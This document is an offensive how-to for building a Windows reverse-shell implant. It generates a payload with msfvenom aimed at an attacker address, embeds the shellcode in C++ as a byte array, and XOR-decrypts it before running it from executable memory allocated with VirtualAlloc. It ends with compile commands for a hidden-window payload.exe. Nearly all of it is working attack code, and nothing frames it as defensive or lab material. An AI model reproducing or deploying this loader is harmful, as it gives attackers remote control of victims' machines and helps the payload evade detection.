0. Binary creation and insertion

msfvenom -p windows/shell/reverse_tcp LHOST=172.23.23.32 LPORT=443 -f raw > mal.bin

To include your binary file (mal.bin) in your C++ code, follow these steps:

1. Convert mal.bin to a C++ Byte Array

Since mal.bin contains raw binary data, you need to convert it into a byte array to embed it in your C++ code. Use xxd (Linux/macOS) or a Python script (Windows/Linux) for conversion.

Method 1: Use xxd (Linux/macOS)

Run this command to convert mal.bin to a C-style byte array:

xxd -i mal.bin > mal_payload.h

This generates output like:

unsigned char mal_bin[] = {
  0x1d, 0x52, 0x30, 0x52, 0x08, 0x75, 0x7d, 0x3b, 0x7d, 0x24, 0x75, 0x58,
  0x58, 0x24, 0x66, 0x4c, 0xd0, 0x8a, 0x58, 0x20, 0x50, 0xd3, 0x8b, 0x48,
  // ... rest of the binary data
};
unsigned int mal_bin_len = 256; // Adjust based on actual size

Now, you can include this file in your C++ code:

#include "mal_payload.h"

Method 2: Use Python to Convert mal.bin (Windows/Linux)

with open("mal.bin", "rb") as f:
    data = f.read()

print("unsigned char mal_bin[] = {", end="")
for i, byte in enumerate(data):
    print(f"0x{byte:02X}, ", end="")
    if (i + 1) % 16 == 0:
        print()
print("};")

print(f"unsigned int mal_bin_len = {len(data)};")

Run this script, and copy the output into your C++ file.

2. Modify C++ Code to Use mal.bin

Now, modify the code to use the embedded binary payload instead of a manually typed shellcode:

#include <iostream>
#include <windows.h>
#include "mal_payload.h"  // Include the converted binary file

/*
	- pShellcode : Base address of the payload to encrypt 
	- sShellcodeSize : The size of the payload 
	- bKey : A random array of bytes of specific size
	- sKeySize : The size of the key
*/
void XorByInputKey(PBYTE pShellcode, SIZE_T sShellcodeSize, PBYTE bKey, SIZE_T sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j >= sKeySize) {
            j = 0;  // Reset key index when reaching the end
        }
        pShellcode[i] ^= bKey[j];  // XOR encryption
    }
}

int main() {
    PBYTE shellcode = (PBYTE)mal_bin;
    SIZE_T shellcode_size = mal_bin_len;

    unsigned char key[] = { 0xAA, 0xBB, 0xCC }; // Multi-byte XOR key
    SIZE_T key_size = sizeof(key);

    std::cout << "Original Encrypted Payload:\n";
    for (SIZE_T i = 0; i < shellcode_size; i++) {
        std::cout << "0x" << std::hex << (int)shellcode[i] << " ";
    }
    std::cout << "\n";

    // Decrypt before execution
    XorByInputKey(shellcode, shellcode_size, key, key_size);

    // Allocate executable memory
    void* exec_mem = VirtualAlloc(NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed!\n";
        return 1;
    }

    // Copy decrypted shellcode to allocated memory
    memcpy(exec_mem, shellcode, shellcode_size);

    // Execute the shellcode
    ((void(*)())exec_mem)();

    return 0;
}

Final Steps

1. Convert mal.bin to a C array using xxd -i or Python.
2. Include mal_payload.h in your C++ file.
3. Use mal_bin and mal_bin_len instead of manually typing shellcode.
4. Compile & Run:

   g++ -o payload.exe payload.cpp -static -mwindows
   

   Or for MinGW on Windows:

   x86_64-w64-mingw32-g++ -o payload.exe payload.cpp -static
   

`